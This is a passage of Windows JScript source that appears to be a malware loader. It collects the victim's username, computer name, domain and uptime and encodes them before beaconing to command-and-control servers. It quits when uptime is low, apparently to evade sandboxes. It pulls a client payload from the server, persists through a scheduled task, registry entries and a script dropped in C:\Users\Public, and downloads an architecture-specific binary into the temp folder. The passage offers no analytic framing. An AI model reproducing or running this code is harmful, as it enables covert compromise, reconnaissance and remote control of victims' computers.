3511. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
3512. return fHandle.ReadAll();
3513. }
3514.  
3515. Windows.GetWMIProvider = function(pcname){
3516. return GetObject("winmgmts:"+
3517. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
3518. }
3519.  
3520. Windows.GetUptime = function(){
3521. try{
3522. var wmi = Windows.GetWMIProvider(".");
3523. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
3524. var e = new Enumerator(queryResult);
3525.  
3526. return parseInt(e.item().SystemUpTime);
3527. }catch(e){
3528. return 0;
3529. }
3530. }
3531.  
3532. Windows.GetArch = function(){
3533. var architecture = "64";
3534. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
3535.  
3536. if(product.indexOf('Windows 7') != -1){
3537. architecture = "32";
3538. }
3539.  
3540. return architecture;
3541. }
3542.  
3543.  
3544. var Http = {};
3545. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
3546. Http.Request = function(url){
3547. try{
3548. Http.Client.Open('GET', url, false);
3549. Http.Client.Send();
3550.  
3551. if(Http.Client.Status == 200)
3552. return Http.Client.ResponseText;
3553. else
3554. return "";
3555. }catch(e){
3556. return ""
3557. }
3558. }
3559.  
3560.  
3561. var Loader = {};
3562. Loader.USERNAME = Windows.GetEnv("%username%");
3563. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
3564. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
3565. Loader.Uptime = Windows.GetUptime();
3566. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
3567.  
3568. Loader.GetUid = function(){
3569. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
3570. }
3571.  
3572. Loader.GetInitialRequest = function(nonce){
3573. var uid = Loader.GetUid();
3574. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
3575.  
3576. var sessionKey = nonce + config.C2_OB_KEY;
3577. request = request.join(":");
3578. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
3579. request = Base64Encode(request);
3580.  
3581. return encodeURIComponent(request);
3582. }
3583.  
3584. Loader.GetInitialEndpoint = function(){
3585. var nonce = DataTools.Random.String(12)
3586. var request = Loader.GetInitialRequest(nonce);
3587.  
3588. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
3589. return endpoint;
3590. }
3591.  
3592. Loader.DeployHost = function(){
3593. var temp = Windows.GetEnv("%temp%");
3594. var architecture = Windows.GetArch();
3595. var nonce = DataTools.Random.String(12);
3596. var uid = Loader.GetUid();
3597. var sessionKey = nonce + config.C2_OB_KEY;
3598.  
3599. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
3600. encodedId = Base64Encode(encodedId);
3601. encodedId = encodeURIComponent(encodedId);
3602.  
3603. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
3604. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
3605.  
3606. var filename = uid.concat(".bin");
3607.  
3608. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
3609. return temp.concat("\\").concat(filename);
3610.  
3611. }
3612.  
3613. Loader.DeployClient = function() {
3614. if (Loader.Uptime <= 3000) {
3615. WScript.Quit(0);
3616. }
3617.  
3618. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
3619. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
3620. try {
3621. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
3622. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
3623.  
3624. if (response.indexOf('<<<CLIENT__') !== -1) {
3625. var client = response.replace('<<<CLIENT__', '');
3626. client = Base64text(client);
3627.  
3628. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
3629. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
3630.  
3631. SELECTED_C2 = config.PRIMARY_C2[j];
3632. Loader.Persist(client);
3633. return;
3634.  
3635. }
3636. } catch (e) {
3637.  
3638. }
3639.  
3640. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
3641. }
3642. }
3643. }
3644.  
3645. Loader.Persist = function(client){
3646.  
3647. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
3648. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
3649.  
3650. Windows.Execute(taskCommand);
3651. Windows.RegWrite("ServerUrl", client);
3652. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
3653.  
3654. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
3655.  
3656. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
3657.  
3658. Loader.DeployHost();
3659. }
3660.  
3661. function debug(message){
3662. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
3663. }
3664.  
3665.  
3666. function Base64text(string){
3667. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
3668. var element = XmlDOM.createElement("tempContainer");
3669. element.dataType = "bin.Base64";
3670. element.text = string;
3671.  
3672. var stream = WScript.CreateObject("ADODB.Stream");
3673. stream.Type = 1;
3674. stream.Open();
3675. stream.Write(element.nodeTypedValue);
3676.  
3677. stream.Position = 0;
3678. stream.Type = 2;
3679. stream.CharSet = "utf-8";
3680.  
3681. return stream.ReadText();
3682. }
3683.  
3684. function StringToBinary(string){
3685. var BinaryStream = new ActiveXObject("ADODB.Stream");
3686. BinaryStream.Type = 2;
3687. BinaryStream.CharSet = "ascii";
3688. BinaryStream.Open();
3689. BinaryStream.WriteText(string);
3690. BinaryStream.Position = 0;
3691. BinaryStream.Type = 1;
3692. BinaryStream.Position = 0;
3693. return BinaryStream.Read();
3694. }
3695.  
3696.  
3697. function Base64bytes(string){
3698. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
3699. var element = XmlDOM.createElement("Base64Data");
3700. element.dataType = "bin.base64";
3701.  
3702. element.text = string;
3703.  
3704. var stream = WScript.CreateObject("ADODB.Stream");
3705. stream.Type = 1;
3706. stream.Open();
3707.  
3708. stream.Write(element.nodeTypedValue);
3709. return stream;
3710. }
3711.  
3712. function Base64Encode(string) {
3713.  
3714. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
3715. var element = XmlDOM.createElement("Base64Data");
3716. element.dataType = "bin.base64";
3717.  
3718. element.nodeTypedValue = StringToBinary(string);
3719.  
3720. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
3721. }
3722.  
3723.  
3724. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
3725. Loader.DeployClient();
3726. }